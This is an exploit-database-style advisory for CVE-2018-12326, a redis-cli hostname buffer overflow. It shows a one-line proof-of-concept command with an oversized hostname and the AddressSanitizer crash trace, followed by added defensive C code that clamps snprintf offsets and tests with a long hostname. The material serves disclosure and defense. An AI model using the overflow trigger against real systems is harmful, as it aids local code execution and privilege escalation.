Last active
March 18, 2022 04:31
CVE-2018-12326
# Exploit Title: Redis-cli Buffer Overflow | |
# Date: 2018-06-13 | |
# Exploit Author: Fakhri Zulkifli (@d0lph1n98) | |
# Vendor Homepage: https://redis.io/ | |
# Software Link: https://redis.io/download | |
# Version: 5.0, 4.0, 3.2 | |
# Fixed on: 5.0, 4.0, 3.2 | |
# CVE : CVE-2018-12326 | |
Buffer overflow in redis-cli of Redis version 3.2, 4.0, and 5.0 allows a local attacker to achieve code execution and escalate to higher privileges via a long string in the hostname parameter. | |
$ ./src/redis-cli -h `python -c 'print "A" * 300'` | |
Could not connect to Redis at AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:6379: Name or service not known | |
#0 0x4a4182 in vsnprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1566 | |
#1 0x4a42d0 in snprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1637 | |
#2 0x570159 in repl /home/user/redis/src/redis-cli.c:1624:5 | |
#3 0x55ba77 in main /home/user/redis/src/redis-cli.c:6660:9 | |
#4 0x7f6be5f6e82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291 | |
#5 0x4247a8 in _start (/home/user/redis/src/redis-cli+0x4247a8) | |
References: | |
1. https://raw.githubusercontent.com/antirez/redis/4.0/00-RELEASENOTES | |
2. https://raw.githubusercontent.com/antirez/redis/5.0/00-RELEASENOTES |
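
Added example, not part of the original advisory and not Redis source code: the trace above ends in snprintf called from repl, and a common way a bounded snprintf still writes out of bounds is reusing its return value as the next offset. Assuming that bug class, this C code shows a prompt builder that clamps the offset; PROMPT_SIZE, append, build_prompt and long_host_is_contained are hypothetical names, and the 300-byte hostname is constructed to match the report.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
#define PROMPT_SIZE 128 /* assumed buffer size for this example */

/* Unsafe pattern, shown only as a comment:
 *   len  = snprintf(p, size, "%s:%d", host, port);
 *   len += snprintf(p + len, size - len, "[%d]> ", db);
 * snprintf returns the length it WOULD have written. With a 300-byte host,
 * len exceeds size, p + len points past the buffer and size - len wraps. */

/* Append at *len without ever passing out[size-1]. Returns 0 if the text
 * fit, -1 if it was truncated or formatting failed. */
static int append(char *out, size_t size, size_t *len, const char *fmt, ...) {
    va_list ap;
    size_t avail = size - *len;          /* invariant: *len < size */
    va_start(ap, fmt);
    int ret = vsnprintf(out + *len, avail, fmt, ap);
    va_end(ap);
    if (ret < 0) return -1;
    if ((size_t)ret >= avail) {          /* truncated: clamp the offset */
        *len = size - 1;
        return -1;
    }
    *len += (size_t)ret;
    return 0;
}

/* Build "host:port[db]> ". Returns 0 if complete, -1 if truncated. */
int build_prompt(char *out, size_t size, const char *host, int port, int db) {
    size_t len = 0;
    if (size == 0) return -1;
    out[0] = '\0';
    int rc = append(out, size, &len, "%s:%d", host, port);
    if (append(out, size, &len, "[%d]> ", db) != 0) rc = -1;
    return rc;
}

/* Constructed input: a 300-byte hostname as in the report. Returns 1 when
 * truncation is reported and the guard bytes after the buffer are intact. */
int long_host_is_contained(void) {
    struct { char prompt[PROMPT_SIZE]; char guard[8]; } s;
    char host[301];
    memset(host, 'A', 300); host[300] = '\0';
    memset(s.guard, 0x5a, sizeof s.guard);
    int rc = build_prompt(s.prompt, sizeof s.prompt, host, 6379, 0);
    for (size_t i = 0; i < sizeof s.guard; i++)
        if (s.guard[i] != 0x5a) return 0;
    return rc == -1 && strlen(s.prompt) == PROMPT_SIZE - 1;
}
```

A caller that gets -1 back should reject the hostname instead of displaying the truncated prompt.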